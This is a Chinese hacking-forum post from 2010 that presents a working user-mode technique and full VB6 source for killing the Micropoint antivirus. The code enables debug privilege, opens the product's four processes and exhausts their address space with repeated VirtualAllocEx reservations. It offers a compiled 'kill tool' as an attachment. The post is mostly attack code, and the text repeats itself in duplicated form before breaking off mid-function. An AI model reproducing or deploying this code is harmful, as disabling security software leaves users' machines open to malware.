-
-
[旧帖] [原创]环3结束微点----微点内存管理漏洞 0.00雪花
-
发表于: 2010-8-24 05:12
-
今天是2010年8月24号 晚上有点小无聊,不晓得干些什么好~~~
这些日子天天研究驱动编程,说实在,累的不行,连女朋友都冷落了 55555.在此我真诚的向她说声“对不起”
说实在,笔者是个纯菜鸟,自认为属于天赋不足魄力有余那类人,研究驱动程序实属爱好。哈哈。
微点杀毒软件我是比较喜欢的一款杀毒软件,技术很过硬,想法很奇特,老鸟们已经把它研究的不行,不过呢,都是通过驱动的方式来解决它。 就我现在这点水平嘛,看看代码还成,自己去写,估计还得去修炼几年。这不,我就考虑能不能在环3下结束这个家伙。
先自报家门:
************************************************************
name:抹着夏士莲
blog:http://blog.sina.com.cn/driveryk
From:jiangsu live:beijing
************************************************************
笔者使用的技术很简单
1,我们先来看下微点有哪几个进程,哦,原来就4个,其中3个是系统进程
2,因此有必要提升下自己进程的特权级,使其具备debug效能
3,试图用openprocess打开微点进程,OK,特权级提升之后可以全部打开
4,试图用VirtualAllocEx划分一个地址空间看看,哈哈 令人兴奋的是居然成功
5,既然你微点没有inline hook相关内核函数,那么我就对不起你了
6,暴力无限划分,直到所有地址空间全部被“保留”
7,等3分钟,左右,微点4个进程全部退出,win7提示微点退出
8,成功~ 这就是思路。简单吧。
为了提高编程效率,我选择了VB 具体代码如下
窗口代码:
Private Sub Form_Initialize()
Call searchMP
End Sub
Private Sub Form_Load()
Dim currentprocess As Long
Dim a As Long
Dim retlen As Long
Dim tkp As TOKEN_PRIVILEGES
Dim oldtkp As TOKEN_PRIVILEGES
'*******************************************
currentprocess = GetCurrentProcess()
a = OpenProcessToken(currentprocess, TOKEN_ADJUST_PRIVILEGES + TOKEN_QUERY, CurrentProcessToken)
If a = 0 Then
MsgBox ("OpenProcessToken failed!")
End If
a = LookupPrivilegeValue("", "SeDebugPrivilege", CurrentProcessLuid)
If a = 0 Then
MsgBox ("Catch Luid failed!")
End If
'***********************************************
tkp.PrivilegeCount = 1
tkp.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
tkp.Privileges(0).pLuid.highpart = CurrentProcessLuid.highpart
tkp.Privileges(0).pLuid.lowpart = CurrentProcessLuid.lowpart
a = AdjustTokenPrivileges(CurrentProcessToken, False, tkp, LenB(oldtkp), oldtkp, retlen)
If a = 0 Then
MsgBox ("Adjust failed!")
End If
End Sub
模块代码:
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function GetDesktopWindow Lib "user32" () As Long
Public Declare Function CreateThread Lib "kernel32" (lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32" () As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LARGE_INTEGER) As Long
Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
'*******************************************
Public Const MK_LBUTTON = &H1
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDLAST = 1
Public Const GW_HWNDNEXT = 2
Public Const GW_HWNDPREV = 3
Public Const WM_GETTEXT = &HD
Public Const WM_LBUTTONUP = &H202
Public Const GW_CHILD = 5
Public Const WM_LBUTTONDOWN = &H201
Public Const ANYSIZE_ARRAY = 1
Public Const TOKEN_ADJUST_PRIVILEGES = &H20
Public Const TOKEN_QUERY = &H8
Public Const SE_DEBUG_NAME = "SeDebugPrivilege"
Public Const SE_PRIVILEGE_ENABLED = &H2
Public Const PROCESS_ALL_ACCESS = &H1F0FFF
Public Const MEM_RESERVE = 4096
Public Const PAGE_READWRITE = 4
'**********************************************
Public Anquanhwnd As Long
Public Anquanname As String
Public AnquanThreadid As Long
Public AnquanProcessid As Long
Public CurrentProcessToken As Long
Public CurrentProcessLuid As LARGE_INTEGER
Public DestProcesshnd As Long
Public DestProcessAllocAddress As Long
'###################
Public MP1 As String
Public MP2 As String
Public MP3 As String
Public MP4 As String
Public MP1ID As Long
Public MP2ID As Long
Public MP3ID As Long
Public MP4ID As Long
Public hMP1 As Long
Public hMP2 As Long
Public hMP3 As Long
Public hMP4 As Long
Public AllocMP1 As Long
Public AllocMP2 As Long
Public AllocMP3 As Long
Public AllocMP4 As Long
'###################
'*********************************************
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Public Type SECURITY_DESCRIPTOR
Revision As Byte
Sbz1 As Byte
Control As Long
Owner As Long
Group As Long
Sacl As ACL
Dacl As ACL
End Type
Public Type LUID
lowpart As Long
highpart As Long
End Type
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type
Public Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
'*************************************************
Public Const SWP_FRAMECHANGED = &H20
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOZORDER = &H4
Public Const SWP_NOMOVE = &H2
Public Const SWP_DRAWFRAME = SWP_FRAMECHANGED
Public Const GWL_STYLE = (-16)
Public Const WS_THICKFRAME = &H40000
Public Const WS_BORDER = &H800000
Public Const PROCESS_VM_READ = &H10
Public Const TH32CS_SNAPPROCESS = &H2
Public Const MEM_DECOMMIT = &H4000
Public Const PROCESS_Create_THREAD = (&H2)
Public Const PROCESS_VM_OPERATION = (&H8)
Public Const PROCESS_VM_WRITE = (&H20)
Public Const INFINITE = &HFFFF ' Infinite timeout
Public Declare Function GetInputState Lib "user32" () As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, _
ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" _
(ByVal lpModuleName As String) As Long
'得到函数地址与dll模块地址
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" _
(ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, _
lppe As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSapshot As Long, _
lppe As PROCESSENTRY32) As Long
'这三个api用来遍历进程
Public Type PROCESSENTRY32
dwSize As Long
cntUseage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
swFlags As Long
szExeFile As String * 1024
End Type
Public Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Function searchMP()
Dim MySnapHandle As Long
Dim ProcessInfo As PROCESSENTRY32
Dim MyRemoteProcessId As Long
Dim a As Long
MP1 = "MPMon.exe"
MP2 = "MPSVC.exe"
MP3 = "MPSVC1.exe"
MP4 = "MPSVC2.exe"
MySnapHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
ProcessInfo.dwSize = Len(ProcessInfo)
If Process32First(MySnapHandle, ProcessInfo) <> 0 Then
Do
If InStr(ProcessInfo.szExeFile, MP1) > 0 _
Or InStr(ProcessInfo.szExeFile, MP2) > 0 _
Or InStr(ProcessInfo.szExeFile, MP3) > 0 _
Or InStr(ProcessInfo.szExeFile, MP4) > 0 Then
Form1.List1.AddItem (ProcessInfo.szExeFile)
Form1.List2.AddItem (ProcessInfo.th32ProcessID)
If InStr(ProcessInfo.szExeFile, MP1) > 0 Then
MP1ID = ProcessInfo.th32ProcessID
hMP1 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP1ID)
If hMP1 = 0 Then
MsgBox ("Open the MPMon.exe failed !!")
End If
End If
If InStr(ProcessInfo.szExeFile, MP2) > 0 Then
MP2ID = ProcessInfo.th32ProcessID
hMP2 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP2ID)
If hMP2 = 0 Then
MsgBox ("Open the MPSVC.exe failed !!")
End If
End If
If InStr(ProcessInfo.szExeFile, MP3) > 0 Then
MP3ID = ProcessInfo.th32ProcessID
hMP3 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP3ID)
If hMP3 = 0 Then
MsgBox ("Open the MPSVC1.exe failed !!")
End If
End If
If InStr(ProcessInfo.szExeFile, MP4) > 0 Then
MP4ID = ProcessInfo.th32ProcessID
hMP4 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP4ID)
If hMP4 = 0 Then
MsgBox ("Open the MPSVC2.exe failed !!")
End If
End If
End If
Loop While Process32Next(MySnapHandle, ProcessInfo) <> 0
End If
CloseHandle MySnapHandle
'***************************
Call AllocMemMP
End Function
Function AllocMemMP()
Dim x As Long
Dim newthreadid As Long
Dim attr As SECURITY_ATTRIBUTES
Dim sd As SECURITY_DESCRIPTOR
attr.nLength = LenB(attr)
attr.bInheritHandle = 0
attr.lpSecurityDescriptor = VarPtr(sd) '取地址
attr.bInheritHandle = 0
If hMP1 <> 0 And hMP2 <> 0 And hMP3 <> 0 And hMP4 <> 0 Then
x = CreateThread(attr, 0, StartAllocMP1, 0, 0, newthreadid) 'varptr 针对于any类型数据
x = CreateThread(attr, 0, StartAllocMP2, 0, 0, newthreadid)
x = CreateThread(attr, 0, StartAllocMP3, 0, 0, newthreadid)
x = CreateThread(attr, 0, StartAllocMP4, 0, 0, newthreadid)
'Call StartAllocMP1
'Call StartAllocMP2
'Call StartAllocMP3
' Call StartAllocMP4
Else
MsgBox ("One of the four processes of the MP AutiVirus have not been opened !!!")
End If
End Function
Function StartAllocMP1()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
Do
AllocMP1 = VirtualAllocEx(hMP1, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP1 > 0
MsgBox ("MPMon.EXE has been Alloc !!")
End Function
Function StartAllocMP2()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
Do
AllocMP2 = VirtualAllocEx(hMP2, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP2 > 0
MsgBox ("MPSVC.EXE has been Alloc !!")
End Function
Function StartAllocMP3()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
Do
AllocMP3 = VirtualAllocEx(hMP3, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP3 > 0
MsgBox ("MPSVC1.EXE has been Alloc !!")
End Function
Function StartAllocMP4()
AllocMemSizeOne = 50000000
AllocMemSizeTwo = 5000000
AllocMemSizeThree = 2500000
AllocMemSizeFour = 1000000
AllocMemSizeFive = 500000
AllocMemSizeSix = 250000
AllocMemSizeSeven = 100000
AllocMemSizeEight = 50000
AllocMemSizeNine = 500
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeOne, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeTwo, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeThree, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeFour, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeFive, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeSix, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeSeven, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeEigth, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
Do
AllocMP4 = VirtualAllocEx(hMP4, 0, AllocMemSizeNine, MEM_RESERVE, PAGE_READWRITE)
Loop While AllocMP4 > 0
MsgBox ("MPSVC2.EXE has been Alloc !!")
End Function
附件里就是编译好的 微点专杀工具 在window 7下测试通过
需要注意的是,运行之后需要稍等一会,你可以去泡杯咖啡。
好了 早上5点了,晕 还要上班 ,怎么办
这些日子天天研究驱动编程,说实在,累的不行,连女朋友都冷落了 55555.在此我真诚的向她说声“对不起”
说实在,笔者是个纯菜鸟,自认为属于天赋不足魄力有余那类人,研究驱动程序实属爱好。哈哈。
微点杀毒软件我是比较喜欢的一款杀毒软件,技术很过硬,想法很奇特,老鸟们已经把它研究的不行,不过呢,都是通过驱动的方式来解决它。 就我现在这点水平嘛,看看代码还成,自己去写,估计还得去修炼几年。这不,我就考虑能不能在环3下结束这个家伙。
先自报家门:
************************************************************
name:抹着夏士莲
blog:http://blog.sina.com.cn/driveryk
From:jiangsu live:beijing
************************************************************
笔者使用的技术很简单
1,我们先来看下微点有哪几个进程,哦,原来就4个,其中3个是系统进程
2,因此有必要提升下自己进程的特权级,使其具备debug效能
3,试图用openprocess打开微点进程,OK,特权级提升之后可以全部打开
4,试图用VirtualAllocEx划分一个地址空间看看,哈哈 令人兴奋的是居然成功
5,既然你微点没有inline hook相关内核函数,那么我就对不起你了
6,暴力无限划分,直到所有地址空间全部被“保留”
7,等3分钟,左右,微点4个进程全部退出,win7提示微点退出
8,成功~ 这就是思路。简单吧。
为了提高编程效率,我选择了VB 具体代码如下
窗口代码:
Private Sub Form_Initialize()
Call searchMP
End Sub
Private Sub Form_Load()
Dim currentprocess As Long
Dim a As Long
Dim retlen As Long
Dim tkp As TOKEN_PRIVILEGES
Dim oldtkp As TOKEN_PRIVILEGES
'*******************************************
currentprocess = GetCurrentProcess()
a = OpenProcessToken(currentprocess, TOKEN_ADJUST_PRIVILEGES + TOKEN_QUERY, CurrentProcessToken)
If a = 0 Then
MsgBox ("OpenProcessToken failed!")
End If
a = LookupPrivilegeValue("", "SeDebugPrivilege", CurrentProcessLuid)
If a = 0 Then
MsgBox ("Catch Luid failed!")
End If
'***********************************************
tkp.PrivilegeCount = 1
tkp.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED
tkp.Privileges(0).pLuid.highpart = CurrentProcessLuid.highpart
tkp.Privileges(0).pLuid.lowpart = CurrentProcessLuid.lowpart
a = AdjustTokenPrivileges(CurrentProcessToken, False, tkp, LenB(oldtkp), oldtkp, retlen)
If a = 0 Then
MsgBox ("Adjust failed!")
End If
End Sub
模块代码:
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function GetDesktopWindow Lib "user32" () As Long
Public Declare Function CreateThread Lib "kernel32" (lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long
Public Declare Function GetWindowThreadProcessId Lib "user32" (ByVal hwnd As Long, lpdwProcessId As Long) As Long
Public Declare Function GetCurrentProcess Lib "kernel32" () As Long
Public Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long
Public Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Public Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, _
ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, _
ByVal flProtect As Long) As Long
Public Declare Function LookupPrivilegeValue Lib "advapi32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, lpLuid As LARGE_INTEGER) As Long
Public Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long
Public Declare Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long
'*******************************************
Public Const MK_LBUTTON = &H1
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDLAST = 1
Public Const GW_HWNDNEXT = 2
Public Const GW_HWNDPREV = 3
Public Const WM_GETTEXT = &HD
Public Const WM_LBUTTONUP = &H202
Public Const GW_CHILD = 5
Public Const WM_LBUTTONDOWN = &H201
Public Const ANYSIZE_ARRAY = 1
Public Const TOKEN_ADJUST_PRIVILEGES = &H20
Public Const TOKEN_QUERY = &H8
Public Const SE_DEBUG_NAME = "SeDebugPrivilege"
Public Const SE_PRIVILEGE_ENABLED = &H2
Public Const PROCESS_ALL_ACCESS = &H1F0FFF
Public Const MEM_RESERVE = 4096
Public Const PAGE_READWRITE = 4
'**********************************************
Public Anquanhwnd As Long
Public Anquanname As String
Public AnquanThreadid As Long
Public AnquanProcessid As Long
Public CurrentProcessToken As Long
Public CurrentProcessLuid As LARGE_INTEGER
Public DestProcesshnd As Long
Public DestProcessAllocAddress As Long
'###################
Public MP1 As String
Public MP2 As String
Public MP3 As String
Public MP4 As String
Public MP1ID As Long
Public MP2ID As Long
Public MP3ID As Long
Public MP4ID As Long
Public hMP1 As Long
Public hMP2 As Long
Public hMP3 As Long
Public hMP4 As Long
Public AllocMP1 As Long
Public AllocMP2 As Long
Public AllocMP3 As Long
Public AllocMP4 As Long
'###################
'*********************************************
Public Type SECURITY_ATTRIBUTES
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Public Type ACL
AclRevision As Byte
Sbz1 As Byte
AclSize As Integer
AceCount As Integer
Sbz2 As Integer
End Type
Public Type SECURITY_DESCRIPTOR
Revision As Byte
Sbz1 As Byte
Control As Long
Owner As Long
Group As Long
Sacl As ACL
Dacl As ACL
End Type
Public Type LUID
lowpart As Long
highpart As Long
End Type
Public Type LARGE_INTEGER
lowpart As Long
highpart As Long
End Type
Public Type LUID_AND_ATTRIBUTES
pLuid As LUID
Attributes As Long
End Type
Public Type TOKEN_PRIVILEGES
PrivilegeCount As Long
Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES
End Type
'*************************************************
Public Const SWP_FRAMECHANGED = &H20
Public Const SWP_NOSIZE = &H1
Public Const SWP_NOZORDER = &H4
Public Const SWP_NOMOVE = &H2
Public Const SWP_DRAWFRAME = SWP_FRAMECHANGED
Public Const GWL_STYLE = (-16)
Public Const WS_THICKFRAME = &H40000
Public Const WS_BORDER = &H800000
Public Const PROCESS_VM_READ = &H10
Public Const TH32CS_SNAPPROCESS = &H2
Public Const MEM_DECOMMIT = &H4000
Public Const PROCESS_Create_THREAD = (&H2)
Public Const PROCESS_VM_OPERATION = (&H8)
Public Const PROCESS_VM_WRITE = (&H20)
Public Const INFINITE = &HFFFF ' Infinite timeout
Public Declare Function GetInputState Lib "user32" () As Long
Public Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, _
ByVal lpProcName As String) As Long
Public Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" _
(ByVal lpModuleName As String) As Long
'得到函数地址与dll模块地址
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" _
(ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapshot As Long, _
lppe As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSapshot As Long, _
lppe As PROCESSENTRY32) As Long
'这三个api用来遍历进程
Public Type PROCESSENTRY32
dwSize As Long
cntUseage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
swFlags As Long
szExeFile As String * 1024
End Type
Public Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long
Public Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Public Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Function searchMP()
Dim MySnapHandle As Long
Dim ProcessInfo As PROCESSENTRY32
Dim MyRemoteProcessId As Long
Dim a As Long
MP1 = "MPMon.exe"
MP2 = "MPSVC.exe"
MP3 = "MPSVC1.exe"
MP4 = "MPSVC2.exe"
MySnapHandle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
ProcessInfo.dwSize = Len(ProcessInfo)
If Process32First(MySnapHandle, ProcessInfo) <> 0 Then
Do
If InStr(ProcessInfo.szExeFile, MP1) > 0 _
Or InStr(ProcessInfo.szExeFile, MP2) > 0 _
Or InStr(ProcessInfo.szExeFile, MP3) > 0 _
Or InStr(ProcessInfo.szExeFile, MP4) > 0 Then
Form1.List1.AddItem (ProcessInfo.szExeFile)
Form1.List2.AddItem (ProcessInfo.th32ProcessID)
If InStr(ProcessInfo.szExeFile, MP1) > 0 Then
MP1ID = ProcessInfo.th32ProcessID
hMP1 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP1ID)
If hMP1 = 0 Then
MsgBox ("Open the MPMon.exe failed !!")
End If
End If
If InStr(ProcessInfo.szExeFile, MP2) > 0 Then
MP2ID = ProcessInfo.th32ProcessID
hMP2 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP2ID)
If hMP2 = 0 Then
MsgBox ("Open the MPSVC.exe failed !!")
End If
End If
If InStr(ProcessInfo.szExeFile, MP3) > 0 Then
MP3ID = ProcessInfo.th32ProcessID
hMP3 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP3ID)
If hMP3 = 0 Then
MsgBox ("Open the MPSVC1.exe failed !!")
End If
End If
If InStr(ProcessInfo.szExeFile, MP4) > 0 Then
MP4ID = ProcessInfo.th32ProcessID
hMP4 = OpenProcess(PROCESS_ALL_ACCESS, 0, MP4ID)
If hMP4 = 0 Then
MsgBox ("Open the MPSVC2.exe failed !!")
End If
End If
End If
Loop While Process32Next(MySnapHandle, ProcessInfo) <> 0
End If
CloseHandle MySnapHandle
'***************************
Call AllocMemMP
End Function
Function AllocMemMP()
Dim x As Long
Dim newthreadid As Long
Dim attr As SECURITY_ATTRIBUTES
Dim sd As SECURITY_DESCRIPTOR
attr.nLength = LenB(attr)
attr.bInheritHandle = 0
attr.lpSecurityDescriptor = VarPtr(sd) '取地址
attr.bInheritHandle = 0
If hMP1 <> 0 And hMP2 <> 0 And hMP3 <> 0 And hMP4 <> 0 Then
x = CreateThread(attr, 0, StartAllocMP1, 0, 0, newthreadid) 'varptr 针对于any类型数据
x = CreateThread(attr, 0, StartAllocMP2, 0, 0, newthreadid)
x = CreateThread(attr, 0, StartAllocMP3, 0, 0, newthreadid)
x = CreateThread(attr, 0, StartAllocMP4, 0, 0, newthreadid)
'Call StartAllocMP1
'Call StartAllocMP2
